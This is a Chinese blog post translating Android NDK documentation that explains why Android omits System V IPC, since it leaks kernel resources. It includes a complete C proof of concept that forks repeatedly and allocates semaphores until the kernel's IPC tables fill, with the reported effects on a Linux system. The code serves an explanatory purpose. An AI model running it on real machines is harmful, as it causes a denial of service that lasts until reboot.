【翻译】(17)SYSV IPC

最新推荐文章于 2023-10-15 23:24:16 发布

原创最新推荐文章于 2023-10-15 23:24:16 发布 · 285 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#移动开发 #操作系统

Android NDK文档自译专栏收录该内容

23 篇文章

订阅专栏

本文解析了Android为何不支持系统五进程间通信，包括导致全局内核资源泄漏的原因，以及该限制可能导致的系统行为异常。通过一个简单的Linux漏洞演示，展示了系统五IPC在实际应用中的潜在风险。

-----------------

英文文档见android-ndk-r6b的documentation.html

属于Android Native Development Kit (NDK)的一部分

见

http://developer.android.com/sdk/ndk/index.html

翻译仅个人见解

-----------------

Android does not support System V IPCs, i.e. the facilities provided by the following standard Posix headers:

Android不支持系统五进程间通信。即以下标准Posix头文件提供的工具：（注：Posix是Unix可移植操作系统接口的简称，是一种操作系统的API标准，但不限于Unix）

<sys/sem.h> /* SysV semaphores 系统五信号量*/

<sys/shm.h> /* SysV shared memory segments 系统五内存段*/

<sys/msg.h> /* SysV message queues 系统五消息队列*/

<sys/ipc.h> /* General IPC definitions 通用进程间通信定义*/

The reason for this is due to the fact that, by design, they lead to global kernel resource leakage.

之所以要这样做，是因为这样的事实，设计上它们会导致全局内核资源泄漏。

For example, there is no way to automatically release a SysV semaphore allocated in the kernel when:

例如，没有一种方法自动地释放在内核中分配的系统五信号量，当：

- a buggy or malicious process exits

- 一个有缺陷或恶意的进程存在。

- a non-buggy and non-malicious process crashes or is explicitly killed.

- 一个无缺陷且无恶意的进程崩溃或显式地被杀掉。

Killing processes automatically to make room for new ones is an important part of Android's application lifecycle implementation. This means that, even assuming only non-buggy and non-malicious code, it is very likely that over time, the kernel global tables used to implement SysV IPCs will fill up.

自动杀掉进程以腾出空间给新的进程，是Android应用程序生命周期实现的重要部分。这意味着，即便假设只有无缺陷且无恶意的代码，还是非常可能在不久后，用于实现系统五IPC的内核全局表将被填满。

At that point, strange failures are likely to occur and prevent programs that use them to run properly until the next reboot of the system.

到那时，奇怪的失败有可能会发生，并且阻止使用它们的程序正常运行，直至下一次系统重启。

And we can't ignore potential malicious applications. As a proof of concept here is a simple exploit that you can run on a standard Linux box today:

而且，我们不可以忽略潜在的恶意应用程序。作为这个观点的证明，这里有一个简单的漏洞（注：这里应该理解为漏洞或溢出攻击），如今你可以运行它在一个标准Linux机器里：

--------------- cut here ------------------------

#include <sys/sem.h>

#include <sys/wait.h>

#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <errno.h>

#define NUM_SEMAPHORES 32

#define MAX_FAILS 10

int main(void)

{

int counter = 0;

int fails = 0;

if (counter == IPC_PRIVATE)

counter++;

printf( "%d (NUM_SEMAPHORES=%d)\n", counter, NUM_SEMAPHORES);

for (;;) {

int ret = fork();

int status;

if (ret < 0) {

perror("fork:");

break;

}

if (ret == 0) {

/* in the child 在子进程中*/

ret = semget( (key_t)counter, NUM_SEMAPHORES, IPC_CREAT );

if (ret < 0) {

return errno;

}

return 0;

}

else {

/* in the parent 在父进程中*/

ret = wait(&status); //注：等待，直至其中一个子进程退出

if (ret < 0) {

perror("waitpid:");

break;

}

if (status != 0) {

status = WEXITSTATUS(status);

fprintf(stderr, "child %d FAIL at counter=%d: %d\n", ret,

counter, status);

if (++fails >= MAX_FAILS)

break;

}

counter++;

if ((counter % 1000) == 0) {

printf("%d\n", counter);

}

if (counter == IPC_PRIVATE)

counter++;

}

return 0;

}

--------------- cut here ------------------------

If you run it on a typical Linux distribution today, you'll discover that it will quickly fill up the kernel's table of unique key_t values, and that strange things will happen in some parts of the system, but not all.

今时今日如果你在一个典型的Linux分发版上运行这个程序，你将发现它很快用唯一的key_t值占满内核表，而且将会在系统的某些部分发生奇怪的事情，但不是全部。

(You can use the "ipcs -u" command to get a summary describing the kernel tables and their allocations)

（你可以使用ipcs -u命令获取一个描述内核表及其分配的概要）

（注：ipcs用于提供IPC设施的状态信息，-u表示summary，我在ubuntu上得到的有共享内存，信号量，消息三项）

For example, in our experience, anything program launched after that that calls strerror() will simply crash. The USB sub-system starts spoutting weird errors to the system console, etc...

例如，以我们的经验看，在发生这种泄漏之后，程序所做的任何事情，一旦其中调用了strerror()就会简单地崩溃。USB子系统开始不断输出奇怪的错误到系统控制台，等等……